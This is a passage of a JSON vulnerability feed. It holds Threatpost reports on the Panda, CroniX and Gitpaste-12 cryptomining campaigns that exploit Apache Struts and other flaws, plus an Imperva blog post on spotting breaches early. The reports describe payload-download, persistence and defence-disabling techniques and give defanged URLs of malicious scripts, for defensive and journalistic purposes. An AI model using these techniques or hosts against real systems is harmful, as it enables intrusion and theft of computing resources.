([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>)).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/17155626/image4.png>)\n\nThe threat group then would exploit the flaws and install malware, which would set about mining for Monero and hooking up with a crypto-wallet and mining pool.\n\nSince then, in 2019, researchers said that the threat group has constantly evolved to update its infrastructure, exploits and payloads.\n\n\u201cShortly thereafter [the 2018 campaign], we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers,\u201d researchers said. \u201cWe believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems.\u201d\n\nPanda has constantly changed the vulnerabilities that it targets over the past year. For instance, in January 2019, Talos researchers saw Panda exploiting a recently-disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942). And in June 2019, Panda began to target a newer WebLogic vulnerability (CVE-2019-2725) and leveraging an updated payload with new features to download a secondary miner payload.\n\nIn the most recent campaigns, including one which took place in August 2019, Panda began employing a different set of command-and-control (C2) servers as well as a new payload-hosting infrastructure.\n\nIn March 2019, for instance, researchers observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. And in August, researchers said they observed several attacker IPs, post-exploit, pulling down payloads from a newer URL and saving the file as \u201cBBBBB\u201d (a slight departure from previous behavior, when the file was saved under a random 20-character name). Panda would then execute the file via PowerShell.\n\nPanda has changed up its payload over the summer as well, so that it\u2019s initial payload now uses the Certutil command-line utility \u2013 which can be used to obtain certificate authority information and configure Certificate Services \u2013 to download the secondary miner payload.\n\nThough the threat actor has swapped up its payloads, targeting and infrastructure, very little of its TTPs [tactics, techniques and procures] are sophisticated, Cisco\u2019s Evans told Threatpost.\n\nFor instance, \u201cThey attempt to hide their miners using the exact same popular techniques we see with other groups,\u201d he told Threatpost. \u201cTheir infrastructure is predictable: I can usually peg a new Panda domain as soon as I see it in the data; they tend to just be iterations of each other. Their early infrastructure was registered using an email address that immediately allowed Dave to pivot into their social media in China. They attack the same honeypots day after day with the same payloads. They don\u2019t even bother to confirm their victims are running a vulnerable system before they deliver an exploit.\u201d\n\nBetween swapping up its tactics, domains and payloads, researchers said that Panda has now made more than $100,000 through illicit cryptomining \u2013 and moving forward, Panda remains an active threat that system administers should be wary of.\n\n\u201cThere are several ways to detect mining activity but let\u2019s focus on the simple solutions of patching and basic security controls,\u201d Evans told Threatpost. \u201cIf you\u2019re running a web-accessible WebLogic server that has hasn\u2019t been patched against vulnerabilities like CVE-2017-10271, it\u2019s likely they have at least targeted the system for exploitation if not actually dropped a miner on it\u2026 In addition, if you don\u2019t need it open to the Internet, take it off.\u201d\n\n_**Interested in the role of artificial intelligence in cybersecurity, for both offense and defense? Don\u2019t miss our free **_[_**Threatpost webinar**_](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)_**, AI and Cybersecurity: Tools, Strategy and Advice, with senior editor Tara Seals and a panel of experts. **__**[Click here to register.](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)**_\n", "cvss3": {}, "published": "2019-09-17T21:04:35", "type": "threatpost", "title": "Panda Threat Group Mines for Monero With Updated Payload, Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T21:04:35", "id": "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "href": "https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:21:14", "description": "Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as [CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.\n\nStruts 2 is an open-source coding framework and library for enterprise developers popular with developers and companies when creating Java-based applications. Both the exploitable vulnerabilities in question were fixed last November. \n[](<https://threatpost.com/newsletter-sign/>) \nResearchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).\n\n## **PoC Released to GitHub**\n\nThe proof-of-concept (PoC) [released this week ](<https://github.com/cellanu/cve-2019-0230>)raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends a malicious Object-Graph Navigation Language (OGNL) expressions that can then open the door for a remote code-execution attack, according to the security bulletin. OGNL is a Java language that can let attackers access data objects, and then use them to create and inject server-side code.\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,\u201d according to a bulletin issued Friday by the Multi-State Information Sharing &amp; Analysis Center at the Center for Internet Security.\n\nWhile the PoC attack and exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch for the DoS bug (CVE-2019-0233). The vulnerability affects the write permissions of file directories that could lead to conditions ripe for a DoS attack.\n\nAccording to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Strut\u2019s Action that exposes the file.\n\n\u201cAn attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container\u2019s temp directory to read only, such that subsequent upload actions will fail,\u201d [according the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).\n\nThe Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests security teams verify no unauthorized system modifications have occurred on the system before applying the patch, and they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.\n\n**_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary [Threatpost eBook](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>), 2020 in Security: Four Stories from the New Threat Landscape, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. [Click here to download our eBook now](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)._**\n", "cvss3": {}, "published": "2020-08-14T21:20:01", "type": "threatpost", "title": "PoC Exploit Targeting Apache Struts Surfaces on GitHub", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"], "modified": "2020-08-14T21:20:01", "id": "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "href": "https://threatpost.com/poc-exploit-github-apache-struts/158393/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-06T17:40:51", "description": "Researchers have uncovered a new worm targeting Linux based x86 servers, as well as Linux internet of things (IoT) devices (that are based on ARM and MIPS CPUs).\n\nOf note, the malware utilizes GitHub and Pastebin for housing malicious component code, and has at least 12 different attack modules available \u2013 leading researchers to call it \u201cGitpaste-12.\u201d It was first detected by Juniper Threat Labs in attacks on Oct. 15, 2020.\n\n\u201cNo malware is good to have, but worms are particularly annoying,\u201d said researchers with Juniper Threat Labs [in a Thursday post](<https://blogs.juniper.net/en-us/threat-research/gitpaste-12>). \u201cTheir ability to [spread in an automated fashion](<https://threatpost.com/docker-containers-graboid-crypto-worm/149235/>) can lead to lateral spread within an organization or to your hosts attempting to infect other networks across the internet, resulting in poor reputation for your organization.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe first phase of the attack is the initial system compromise. The malware\u2019s various attack modules include 11 previously-disclosed vulnerabilities. That includes flaws in [Apache Struts (CVE-2017-5638),](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>) Asus routers (CVE-2013-5948), Webadmin plugin for opendreambox (CVE-2017-14135) and [Tenda routers (CVE-2020-10987).](<https://threatpost.com/tenda-router-zero-days-spyware-botnet/159834/>)\n\nThe malware will attempt to use known exploits for these flaws to compromise systems and may also attempt to brute force passwords, said researchers. After compromising a system, a main shell script is then uploaded to the victim machine, and starts to download and execute other components of Gitpaste-12.\n\n## **The Malware **\n\nThis script sets up a cron job it downloads from Pastebin. A cron job is a time-based job scheduler in Unix-like computer operating systems. The cron job calls a script and executes it again each minute; researchers believe that this script is presumably one mechanism by which updates can be pushed to the botnet.\n\nIt then downloads a script from GitHub (https://raw[.]githubusercontent[.]com/cnmnmsl-001/-/master/shadu1) and executes it. The script contains comments in the Chinese language and has multiple commands available to attackers to disable different security capabilities. These include stripping the system\u2019s defenses, including firewall rules, selinux (a security architecture for LinuxR systems), apparmor (a Linux kernel security module that allows the system administrator to restrict programs\u2019 capabilities), as well as common attack prevention and monitoring software.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/11/06121832/gitpaste.png>)\n\nThe 11 vulnerabilities utilized for Gitpaste-12\u2019s initial attack vectors. Credit: Juniper Labs\n\nThe malware also has some commands that disable cloud security agents, \u201cwhich clearly indicates the threat actor intends to target public cloud computing infrastructure provided by Alibaba Cloud and Tencent,\u201d said researchers.\n\nGitpaste-12 also features commands allowing it to run a cryptominer that targets the Monero cryptocurrency.\n\n\u201cIt also prevents administrators from collecting information about running processes by intercepting \u2018readdir\u2019 system calls and skip directories for processes like tcpdump, sudo, openssl, etc. in \u2018/proc\u2019,\u201d said researchers. \u201cThe \u2018/proc\u2019 directory in Linux contains information about running processes. It is used, for example, by the \u2018ps\u2019 command to show information about running processes. But unfortunately for this threat actor, this implementation does not do what they expect it to do.\u201d\n\nFinally, the malware also contains a library (hide.so) that is loaded as LD_PRELOAD, which downloads and executes Pastebin files )https://pastebin[.]com/raw/Tg5FQHhf) that host further malicious code.\n\nResearchers said they reported the Pastebin URL, as well as the Git repo mentioned above that downloads malicious scripts for the malware. The Git repo was closed on Oct. 30, 2020. \u201cThis should stop the proliferation of this botnet,\u201d said researchers.\n\n## **Wormable Features**\n\nIn terms of its worming capabilities, Gitpaste-12 also contains a script that launches attacks against other machines, in an attempt to replicate and spread the malware.\n\n\u201cThe malware chooses a random /8 CIDR for attack and will try all addresses within that range,\u201d according to researchers. Classless Inter-Domain Routing (CIDR) is a method for allocating IP addresses and for IP routing \u2013 meaning that the attack targets all IP addresses within the random CIDR\u2019s range.\n\nAnother version of the script also opens ports 30004 and 30005 for reverse shell commands, said researchers. Port 30004 uses the Transmission Control Protocol (TCP), which is one of the main protocols in TCP/IP networks; while port 30005 is a bidirectional SOAP/HTTP-based protocol, which provides communication between devices like routers or network switches, and auto-configuration servers.\n\nWorms can have a widespread impact, [as seen in a 2019 campaign](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>) that exploited a vulnerability in the Exim mail transport agent (MTA) to gain remote command-execution on victims\u2019 Linux systems, using a wormable exploit. Researchers said that currently more than 3.5 million servers were at risk from the attacks.\n\nSeveral new worms have popped up in 2020 so far, [including the Golang worm](<https://threatpost.com/worm-golang-malware-windows-payloads/156924/>), which is aimed at installing cryptominers, and recently changed up its tactics to add attacks on Windows servers and a new pool of exploits to its bag of tricks.\n\nIn August,[ a cryptomining worm](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) from the group known as TeamTNT was found spreading through the Amazon Web Services (AWS) cloud and collecting credentials. Once the logins are harvested, the malware logs in and deploys the XMRig mining tool to mine Monero cryptocurrency.\n\n**Hackers Put Bullseye on Healthcare: **[**On Nov. 18 at 2 p.m. EDT**](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)** find out why hospitals are getting hammered by ransomware attacks in 2020. **[**Save your spot for this FREE webinar**](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)** on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this **[**LIVE**](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)**, limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-11-06T17:34:00", "type": "threatpost", "title": "Gitpaste-12 Worm Targets Linux Servers, IoT Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5948", "CVE-2017-14135", "CVE-2017-5638", "CVE-2020-10987"], "modified": "2020-11-06T17:34:00", "id": "THREATPOST:7B2EAFA107D335014D553D78946C453E", "href": "https://threatpost.com/gitpaste-12-worm-linux-servers-iot-devices/161016/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2022-09-12T15:28:21", "description": "## Key signs to look for in today\u2019s complex data threat landscape\n\n## Introduction\n\nThe most vulnerable data repositories are the ones deep in your organization\u2019s infrastructure. Everyone assumes they are safe, but as with your home, organizations must invest in security at entry points. Otherwise, the result is unsecured valuables lying around out in the open or easy to find in obvious closets or drawers.\n\nWhat happens to security when someone known to the homeowners, like a plumber, gardener, or friend, has access to the house? It becomes much easier for other people to exploit the homeowner and access the property.\n\nThe same principle applies to organizations. They deploy most of their security strategy on the perimeter and leave their \u201cdeep\u201d data repositories vulnerable to data breaches. Bad actors have the opportunity to exploit organization insiders or third-party software components. A [2022 Forrester report](<https://www.imperva.com/resources/resource-library/white-papers/forrester-insider-threats-drive-data-protection-improvements-full-report/>) revealed that 58 percent of sensitive data incidents are caused by insiders, either from non-malicious mistakes or deliberately malicious actions. The report also revealed that 82 percent of organizations do not have an insider risk management strategy or policy. It doesn\u2019t, however, have to be this way.\n\nYour data repositories contain the sensitive personal data of your business, employees, and customers, and, much like the valuables around your home, you should have a security strategy to safeguard them effectively. Staying with the home security metaphor, you need to consider turning the containers of your valuables into secure vessels, minimizing the number of people who could secure access, and gaining the ability to inventory losses when they happen. In data security, this means encryption, minimal entitlements, access control, and advanced analytics. Forrester data suggests, however, that not all organizations understand how to create an effective data security strategy, and their biggest mistake is not effectively addressing the insider threat.\n\nTwo critical business trends contribute to the ease with which bad actors can sneak undetected into your organization&#x27;s infrastructure and breach sensitive data, and we address them in this post. Next, we\u2019ll explain general data breach attack flows and profile typical attackers to help you gain a better understanding of who and what to look for. Finally, we\u2019ll make some recommendations on how you can integrate a modern data security fabric with existing tools to create an effective, sustainable data security strategy.\n\nThe cost of an intruder who has access to the \u201chouse\u201d on an ongoing basis cannot be overstated. Every day, bad actors can exploit your vulnerable data repositories and your structured, semi-structured, and unstructured data to exfiltrate the sensitive information for which you are responsible. This can easily play a role in the data exfiltration process by acting as temporary storage or a proxy to transport the data from a secure environment to an unprotected environment and then to the outside. This is the essence of a data breach - a successful attempt to open the closet or \u201ccrack\u201d the safe and expose the sensitive personal data contained in it.\n\n## Two business trends make organizations vulnerable\n\n 1. **The need to integrate with external technology providers.** Some CISOs and their team members struggle to secure a business services environment, which becomes additionally challenging as business operations agility grows.\n 2. **The evolution of cloud computing.** As organizations transition to the cloud, they are using third-party cloud-managed computing environments and third-party SaaS services to accelerate the migration process.\n\n## Data breaches are far more common today because of third parties\n\nRelying on third party code and services providers means that an organization&#x27;s information technology infrastructure is exposed to suppliers that do not have a robust data security strategy aligned with the organization\u2019s own. The risk becomes much greater as every third-party technology provider&#x27;s security vulnerabilities, in effect, become yours.\n\nThe first step for CISOs and their security teams is to secure all sensitive data assets and gain complete visibility into all data repositories that are part of the organization&#x27;s architecture. This includes legacy repositories deep in the architecture and new ones, in on-premises and cloud-managed environments. Even data repositories that you don\u2019t know exist yet. When you have that level of visibility, then you can evaluate vulnerabilities, figure out who should have privileged access to the repositories and why, then optimize your detection and response process to deal with potential breaches.\n\n## General data breach attack flows\n\nMost data breaches have common characteristics, no matter the details of the breach. First, the attacker needs to penetrate the organization&#x27;s IT (Information Technology) or OT (Operational Technology) environments, look around and find the asset of interest that it can take.\n\n### Examples of Early Signs of a Data Breach\n\n**Signs in critical stages:**\n\n**Reconnaissance:**\n\n * System tables scan\n * Massive database scan\n * Multiple login attempts\n\n**Exploitation:**\n\n * Open command shell\n * Machine takeover\n\n**Data Access:**\n\n * Service account misuse\n * Retrieving high numbers of records\n * Accessing business-critical data\n\n**General Signs:**\n\n * Work/activity in unusual hours\n * Use of dynamic SQL\n\n## Data breach attacker types\n\n### Hit &amp; Run\n\nThis \u201cOpportunist\u201d identifies an opportunity; whether it is a vulnerability, a publicly open database, or something else. The bad actor decides to take what they can and leave. This kind of attacker will not try to search for other databases or penetrate the organization\u2019s network, or try to execute exotic exploits, etc. They will just take what they can, and then sell it to the highest bidder.\n\n### The Curious\n\nThis attacker usually sets out with a purpose, but may decide to look deeper. They may look around a little bit, but not too much. They are still focused on their original purpose, malware deployment, data exfiltration, etc.\n\n### The Resident\n\nThe most dangerous type, as in the \u201cEquifax\u201d breach, the Resident will gain access to the organization\u2019s network and will stay for months, sometimes years. They will use keyloggers, sniffers, and other methods to steal credentials and compromise databases, using \u201c[Low and Slow](<https://www.imperva.com/blog/the-account-takeover-threat-a-by-the-numbers-breakdown/>)\u201d and other methods to stay undetected.\n\n## Common data breach attack examples\n\nThe attacks that cause the greatest damage are \u2018The resident\u2019 attacks. Let&#x27;s consider some examples to understand how these attacks are forged.\n\n### The resident attack\n\nInfosec disasters are typically the result of multiple failures. Invariably, post-breach analysis reveals several security weaknesses that allowed attackers to steal terabytes of information from supposedly secure systems.\n\nThere are several well-known, high-impact incident reports, such as Equifax, Anthem Inc., and the U.S. Office of Personnel Management that describe pre-breach progressions falling under this category.\n\n### Typical attack flow\n\n 1. The initial hack is done via a web-facing application, one example can be the Equifax customer complaint portal and its CVE-2017-5638 vulnerability. **ThreatPost:** _\u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638.\u201d_\n 2. Attackers exploit weaknesses in the company&#x27;s security posture, notably the lack of proper segmentation.\n 3. In almost all major breaches, a lack of continuous security patching of servers and databases contributes to the attack\u2019s success.\n 4. Unpatched servers and databases provide the resident attacker room to operate freely within the company&#x27;s network for a protracted amount of time.\n 5. In almost all these attacks, the intruders were in the company\u2019s environment for months, customizing their attack tools over and over again until the sensitive data was successfully compromised.\n\n### Ransomware attack\n\nThis type of attack is designed to disable critical systems or prevent sensitive data access by privileged users until a specified amount of money is paid. Ransomware attacks have become more and more sophisticated. They typically involve:\n\n1\\. Penetrating the organization&#x27;s IT environment\n\n * Malware installed on an endpoint operating system via a phishing attack.\n * Account Takeover (ATO) attacks use stolen credentials to penetrate the organization\u2019s environment.\n\n2\\. Analyzing network resources to allocate databases that hold personal, financial, or business-critical information.\n\n3\\. Making the original data stored unusable by:\n\n * Encrypting the data.\n * Extract data either to a hidden file in the network or outside.\n * Modify data values stored.\n\n### Ransomware attack detection example\n\nIn this attack, the data is moved from the original database to a readme file.\n\nDB breach flow:\n\n 1. Attacker query for databases list.\n 2. Attacker selects prod_db.\n 3. Data is being stolen from prod_db using the &#x27;select&#x27;.\n 4. Prod_db is being deleted using &#x27;drop&#x27;.\n\n## How should organizations protect their home environment\n\nImperva research shows that much like using a safe at home, when organizations secure their data repositories with a data-centric security fabric, and when a hostile penetration occurs, they dramatically reduce data exfiltration risk by turning all open repositories into well protected alarmed enabled safes. This shortens the path from breach to detection to response.\n\nAs business innovation and the services that support it are digitally transformed, the perimeter boundaries have blurred. The \u201cwalls\u201d that protect data repositories have cracks that allow attackers to put their hands on sensitive data, effectively ending the days of protecting assets within the network perimeter. The security of an organization is only as strong as the weakest link in the security chain. In many cases, better architecture and cross-organization security practices would do the trick, but those practices are not easy to implement and control, nor do they account for the risks presented by third-party technology providers. You must secure all the data repositories they manage, not just the applications and networks that surround them.\n\nThe cause of most breaches is the lack of an in-depth data security strategy. As we discussed before, you can reduce the attack surface by securing your data repositories, but you must gain visibility into them. Next, eliminate excessive privileges from key users and deploy strong authentication mechanisms. Never forget that securing data repositories is a never-ending process, you must always work toward optimizing your security architecture, policies, and practices, both for your assets and employees. Continuously performing data discovery and classification to locate sensitive personal data is a great way to maintain an enterprise-grade data security strategy and eliminate bad practices inside on-premises and cloud-managed environments. Together with implementing [Imperva\u2019s Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) and [Imperva Data Security Fabric](<https://www.imperva.com/products/data-security-fabric/>), it is possible to protect against most potential data breach scenarios.\n\n## On-Demand Webinar: Detecting Attacks on Your Data. How can we do it right?\n\n[Watch now.](<https://community.imperva.com/events/event-description?CalendarEventKey=afb10612-12cf-4e6d-9fe6-b3a4486a966f&CommunityKey=39c6092a-d67a-4bc2-8134-bfbb25fc43af&Home=%2fevents>)\n\nSecurity Analytics are an essential part of the toolkit to protect against data breaches. Are you using Imperva Data Risk Analytics (DRA)? Imperva Data Risk Analytics tools have been purpose-built to recognize threats such as suspicious data access or signs of potentially compromised accounts. But did you know Imperva recently added new features that can recognize the attack signatures of active exploits so you can be instantly notified of an attack in progress?\n\nIn this webinar, Product Manager Oren Graiver, will describe how you can use [Imperva Data Risk Analytics](<https://www.imperva.com/solutions/user-behavior-analytics/>) to augment Imperva vulnerability assessment and data activity monitoring and transform your security posture to proactively prevent data compromise incidents. Topics covered will include:\n\n * Where breaches are found\n * Understanding data breach detection\n * Early signs of a breach\n * Kill chain and data compromise\n * Real life example of a breach DRA can detect - Ransomware\n * What\u2019s on the roadmap?\n\n[Watch the webinar today](<https://community.imperva.com/events/event-description?CalendarEventKey=afb10612-12cf-4e6d-9fe6-b3a4486a966f&CommunityKey=39c6092a-d67a-4bc2-8134-bfbb25fc43af&Home=%2fevents>).\n\nThe post [Two New Trends Make Early Breach Detection and Prevention a Security Imperative](<https://www.imperva.com/blog/two-new-trends-make-early-breach-detection-and-prevention-a-security-imperative/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-31T13:47:34", "type": "impervablog", "title": "Two New Trends Make Early Breach Detection and Prevention a Security Imperative", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2022-08-31T13:47:34", "id": "IMPERVABLOG:CD196CDD794CCCE3719A9D38DA5BE417", "href": 